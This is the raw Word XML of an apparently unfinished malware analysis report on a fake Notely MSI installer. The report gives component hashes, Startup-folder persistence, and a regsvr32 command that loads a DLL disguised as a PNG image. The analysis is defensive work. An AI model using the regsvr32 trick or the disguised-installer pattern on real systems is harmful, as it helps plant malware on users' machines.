    <w:p w14:paraId="23C0E6E3" w14:textId="26C192BF" w:rsidR="00BF2764" w:rsidRPr="00BF2764" w:rsidRDefault="00BF2764" w:rsidP="00BF2764">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After that it </w:t>
      </w:r>
      <w:r w:rsidR="007F67B0">
        <w:t>executes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a command </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2764">
        <w:t>C:\Windows\system32\regsvr32 C:\Users\howl\AppData\Roaming\OneWitch.png</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2764">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2764">
        <w:t>regsvr32 is typically used for registering DLL files, not image files</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2764">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2764">
        <w:t>The registration process involves adding information about the DLL to the Windows Registry, making its functions accessible to other applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0F66FC" w14:textId="7B9422CF" w:rsidR="00BF2764" w:rsidRPr="00BF2764" w:rsidRDefault="007F67B0" w:rsidP="00BF2764">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After all of that it drops the actual supposedly to be a legit program which is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>notely.exe, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>create</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a shortcut for it in Desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E81061" w14:textId="65EE8B9D" w:rsidR="009E133A" w:rsidRPr="009E133A" w:rsidRDefault="009E133A" w:rsidP="00BF2764">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56507A0E" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="5D7B61E1" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="4290D899" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="2208C1B6" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="16EA2C29" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="71C66D65" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="47CC311C" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="2438D447" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="7AAF76F6" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="4729CD3D" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="666D1B36" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="2DE4D9FA" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="53D27F60" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="7B171D75" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="52328A36" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="5FD0817D" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="127CA670" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="0C3B4E18" w14:textId="77777777" w:rsidR="009E133A" w:rsidRDefault="009E133A" w:rsidP="009E133A"/>
    <w:p w14:paraId="7395E57E" w14:textId="77777777" w:rsidR="009E133A" w:rsidRDefault="009E133A" w:rsidP="009E133A"/>
    <w:p w14:paraId="75CC7FB3" w14:textId="77777777" w:rsidR="009E133A" w:rsidRDefault="009E133A" w:rsidP="009E133A"/>
    <w:p w14:paraId="1B5A19F0" w14:textId="77777777" w:rsidR="009E133A" w:rsidRPr="009E133A" w:rsidRDefault="009E133A" w:rsidP="009E133A"/>
    <w:p w14:paraId="04BFADFA" w14:textId="2B0EBBE2" w:rsidR="005F08C6" w:rsidRDefault="00F54E18" w:rsidP="00E20896">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc159205431"/>
      <w:r>
        <w:t>Malware Composition</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="38495D8A" w14:textId="621AFDCF" w:rsidR="00F54E18" w:rsidRDefault="00A34C41" w:rsidP="00F54E18">
      <w:r w:rsidRPr="00290930">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:eastAsia="Times New Roman" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dropper.installer.msi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F54E18">
        <w:t>consists of the following component</w:t>
      </w:r>
      <w:r w:rsidR="00C424D4">
        <w:t>s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F812F43" w14:textId="09FEDBC2" w:rsidR="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00F54E18"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblW w:w="10868" w:type="dxa"/>
        <w:tblInd w:w="-673" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1698"/>
        <w:gridCol w:w="9170"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C424D4" w14:paraId="69C9D334" w14:textId="77777777" w:rsidTr="00390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1BBB434" w14:textId="42D921A6" w:rsidR="00C424D4" w:rsidRPr="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00C424D4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C424D4">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>File Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9170" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08FCEAD6" w14:textId="5A29A180" w:rsidR="00C424D4" w:rsidRPr="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00C42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24D4">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>SHA256 Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C424D4" w14:paraId="6D9C0036" w14:textId="77777777" w:rsidTr="0039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7C396CE" w14:textId="77777777" w:rsidR="00175518" w:rsidRPr="00175518" w:rsidRDefault="00175518" w:rsidP="00175518">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00175518">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>notely-setup-x64.msi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EB86C52" w14:textId="700C6D22" w:rsidR="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00F54E18"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9170" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04207E5A" w14:textId="32A54ADF" w:rsidR="00C424D4" w:rsidRDefault="00A34C41" w:rsidP="00F5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EB0">
              <w:rPr>
                <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1866b0e00325ee8907052386a9286e6ed81695a2eb35d5be318d71d91fbce2db</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A34C41" w14:paraId="4BBA09FA" w14:textId="77777777" w:rsidTr="0039074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B7E1C94" w14:textId="3B1DA49C" w:rsidR="00A34C41" w:rsidRPr="00175518" w:rsidRDefault="00A34C41" w:rsidP="00175518">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Uzip.vbs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9170" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="201B207C" w14:textId="37DF5F6D" w:rsidR="00A34C41" w:rsidRPr="00647EB0" w:rsidRDefault="00870C14" w:rsidP="00F5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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00870C14">
              <w:rPr>
                <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1B418EC1586AD09F77550BB942C594BB5FB69ABF1B046E8E428C95F4B5D01FC3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C424D4" w14:paraId="02C165A2" w14:textId="77777777" w:rsidTr="0039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4C0F654" w14:textId="49B644C2" w:rsidR="00C424D4" w:rsidRDefault="00175518" w:rsidP="00F54E18">
            <w:r>
              <w:t>OneWitch.PNG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9170" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49B6BEC5" w14:textId="3E21453A" w:rsidR="00C424D4" w:rsidRDefault="00FF14EB" w:rsidP="00F5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4EB">
              <w:t>37BD2DBE0AC7C2363313493B11577FDBA37AF73B3EE56154CDEF0CB8B07B751E</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175518" w14:paraId="3A7146D9" w14:textId="77777777" w:rsidTr="0039074F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7985C52" w14:textId="767DAEFF" w:rsidR="00175518" w:rsidRDefault="00175518" w:rsidP="00F54E18">
            <w:r>
              <w:t>Notely.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9170" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B1AB3D2" w14:textId="0C2C5148" w:rsidR="00175518" w:rsidRPr="00C424D4" w:rsidRDefault="00FF14EB" w:rsidP="00F5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4EB">
              <w:t>1E4E1EA2C70EE5634447CF20FDC35A90C7C6D82B5A43F91E613101A05FCBEBA7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="114160B8" w14:textId="217B0D5B" w:rsidR="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00F54E18"/>
    <w:p w14:paraId="32D7B57B" w14:textId="272FB7A3" w:rsidR="00C424D4" w:rsidRDefault="0000714D" w:rsidP="0000714D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc159205432"/>
      <w:r>
        <w:t>srvupdate.exe</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="25AD8F16" w14:textId="696345DD" w:rsidR="0000714D" w:rsidRDefault="0000714D" w:rsidP="00175518">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00C424D4">
        <w:t xml:space="preserve">he initial </w:t>
      </w:r>
      <w:r w:rsidR="00A34C41">
        <w:t>MSI</w:t>
      </w:r>
      <w:r w:rsidR="00C424D4">
        <w:t xml:space="preserve"> that runs </w:t>
      </w:r>
      <w:r w:rsidR="00A34C41">
        <w:t>to drop the malicious files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EC92F9" w14:textId="52F0F15C" w:rsidR="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00F54E18"/>
    <w:p w14:paraId="30032025" w14:textId="02F50A88" w:rsidR="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00F54E18"/>
    <w:p w14:paraId="344AD66E" w14:textId="41B01215" w:rsidR="0000714D" w:rsidRDefault="000129FC" w:rsidP="00F54E18">
      <w:bookmarkStart w:id="5" w:name="_Toc159205433"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>Unzip.vbs</w:t>
      </w:r>
      <w:r w:rsidR="00C424D4" w:rsidRPr="0000714D">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidR="00C424D4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D28112" w14:textId="7790F7FB" w:rsidR="0000714D" w:rsidRDefault="000129FC" w:rsidP="000129FC">
      <w:r>
        <w:t>A Shell script that is executed to unzip the content of the Emergreport.zip and run a script within it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A59098C" w14:textId="77777777" w:rsidR="000129FC" w:rsidRDefault="000129FC" w:rsidP="000129FC"/>
    <w:p w14:paraId="64CFF92D" w14:textId="554E2CA7" w:rsidR="000129FC" w:rsidRDefault="000129FC" w:rsidP="000129FC">
      <w:bookmarkStart w:id="6" w:name="_Toc159205434"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>OneWitch.PNG</w:t>
      </w:r>
      <w:r w:rsidRPr="0000714D">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199731D4" w14:textId="0132D1D8" w:rsidR="000129FC" w:rsidRDefault="000129FC" w:rsidP="000129FC">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DLL that is hidden in the format of an image, that is used for installing the next malicious software</w:t>
      </w:r>
      <w:r w:rsidR="00FF14EB">
        <w:t>, written with NIM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2451328A" w14:textId="77777777" w:rsidR="000129FC" w:rsidRDefault="000129FC" w:rsidP="000129FC"/>
    <w:p w14:paraId="5A0C94D3" w14:textId="16D22782" w:rsidR="000129FC" w:rsidRDefault="000129FC" w:rsidP="000129FC">
      <w:bookmarkStart w:id="7" w:name="_Toc159205435"/>
      <w:r w:rsidRPr="000129FC">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>Notely</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="0000714D">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB64170" w14:textId="4AABC8DF" w:rsidR="000129FC" w:rsidRDefault="000129FC" w:rsidP="000129FC">
      <w:r>
        <w:t>The final file the is collected from the above, which is a malicious dropper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA955D0" w14:textId="7C68C67B" w:rsidR="00F54E18" w:rsidRPr="00942A2A" w:rsidRDefault="00F54E18" w:rsidP="0000714D">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00942A2A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="728D6D2B" w14:textId="44DD193B" w:rsidR="00F54E18" w:rsidRDefault="00F54E18" w:rsidP="00F54E18">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc159205436"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Basic Static Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="711DC3A6" w14:textId="323741D1" w:rsidR="00551809" w:rsidRPr="00551809" w:rsidRDefault="00551809" w:rsidP="00551809">
      <w:r>
        <w:t>{Screenshots and description about basic static artifacts and methods}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F397ED4" w14:textId="77777777" w:rsidR="0039074F" w:rsidRDefault="0039074F" w:rsidP="0039074F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BC359FD" w14:textId="77777777" w:rsidR="00175518" w:rsidRPr="00175518" w:rsidRDefault="00175518" w:rsidP="0039074F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r w:rsidRPr="00175518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>notely-setup-x64.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BE212D" w14:textId="77777777" w:rsidR="0039074F" w:rsidRDefault="0039074F" w:rsidP="0039074F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42845833" w14:textId="77777777" w:rsidR="0039074F" w:rsidRDefault="0039074F" w:rsidP="0039074F">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This file looks like it is a regular MSI file, it uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom Actions </w:t>
      </w:r>
      <w:r>
        <w:t>that can be implemented in installers, as they use them to run scrips and executables</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0039074F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MSIs are just regular OLE storages containing bunch of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">Streams </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(think files), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">Storages </w:t>
      </w:r>
      <w:r>
        <w:t>(think directories), inner tables and typically a single</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t> .CAB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> archive containing all the files to be extracted during installation</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1389412B" w14:textId="77777777" w:rsidR="0039074F" w:rsidRDefault="0039074F" w:rsidP="0039074F">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77DCF9BC" w14:textId="77777777" w:rsidR="0039074F" w:rsidRDefault="0039074F" w:rsidP="0039074F">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t>Looking at strings extract we can find interesting files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF17C56" w14:textId="2F784578" w:rsidR="0039074F" w:rsidRDefault="0039074F" w:rsidP="0039074F">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t>notely-setup-x64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> looks normal</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NoCapSoftware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LLC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> product name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFFC695" w14:textId="770185FA" w:rsidR="0039074F" w:rsidRDefault="0039074F" w:rsidP="0039074F">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t>C__7DA1215618B34D02BA9B5645CE7646E4NOTELY.EXE|notely.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> product name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B722F3A" w14:textId="17F28BC3" w:rsidR="0039074F" w:rsidRDefault="0039074F" w:rsidP="0039074F">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t>Emergreport.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F793C99" w14:textId="057C9587" w:rsidR="0039074F" w:rsidRDefault="0039074F" w:rsidP="0039074F">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r w:rsidRPr="0039074F">
        <w:t>Folder{B31DBD05-2752-3A9D-9588-397C2548766C}C__07FB49E986E34F77A587FE1336135B89EMERGR~1.ZIP|Emergreport.zip_77D723846EB24A58852AABFE167C2217StartupFolder{A8815665-CAE9-264F-71C8-695A8585B1D0}C__77D723846EB24A58852AABFE167C2217UNZIP.VBS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FC167B" w14:textId="40476C52" w:rsidR="0039074F" w:rsidRDefault="0039074F" w:rsidP="0039074F">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r w:rsidRPr="0039074F">
        <w:t>Emergreport.zip_77D723846EB24A58852AABFE167C2217StartupFolder{A8815665-CAE9-264F-71C8-695A8585B1D0}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> having this in the Startup folder looks suspicious.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7514B77C" w14:textId="6D4BE1A1" w:rsidR="0039074F" w:rsidRDefault="0039074F" w:rsidP="0039074F">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r w:rsidRPr="0039074F">
        <w:t>C__77D723846EB24A58852AABFE167C2217UNZIP.VBS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> also having this visual basic file that is within the startup Folder too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4349C0" w14:textId="77777777" w:rsidR="0039074F" w:rsidRDefault="0039074F" w:rsidP="0039074F">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61FA4D82" w14:textId="5BBECCD5" w:rsidR="0039074F" w:rsidRDefault="0039074F" w:rsidP="0039074F">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Some of MSI files </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>contains</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PE within it but we can see that there is VBS file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF5C2E" w14:textId="77777777" w:rsidR="0039074F" w:rsidRDefault="0039074F" w:rsidP="0039074F">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C608CE4" w14:textId="77777777" w:rsidR="0039074F" w:rsidRDefault="0039074F" w:rsidP="0039074F">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BE27080" w14:textId="77777777" w:rsidR="0039074F" w:rsidRDefault="0039074F" w:rsidP="0039074F">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ACD94E9" w14:textId="77777777" w:rsidR="001F1D58" w:rsidRDefault="001F1D58" w:rsidP="001F1D58">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>imgae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WitchABy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that is copied into oneWitch.PNG, is a PE files </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is exported as a DLL file, from PESTUDIO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C769E9D" w14:textId="2BC4B48C" w:rsidR="001F1D58" w:rsidRDefault="001F1D58" w:rsidP="001F1D58">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r w:rsidRPr="001F1D58">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="344F297D" wp14:editId="2B26D5EE">
            <wp:extent cx="5943600" cy="2303780"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1984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F550" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="001F1D58" w:rsidP="001F1D58">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56803AD6" wp14:editId="2E2F8543">
            <wp:extent cx="2914015" cy="320675"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175"/>
            <wp:docPr id="48884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49499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043E" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1" w:rsidP="008945B1">
      <w:pPr>
        <w:pStyle w:val="graf"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01EE7DC0" wp14:editId="099FB940">
            <wp:extent cx="1200785" cy="866775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="17890741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7410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B4C2" w14:textId="183CFBE7" w:rsidR="008945B1" w:rsidRDefault="008945B1" w:rsidP="008945B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4683E">
        <w:t>MSVCRT. DLL is the C standard library for the Visual C++ (MSVC) compiler from version 4.2 to 6.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A60E13" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1" w:rsidP="008945B1">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t>these are the import API calls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B76EB48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GetCurrentProcessId</w:t>
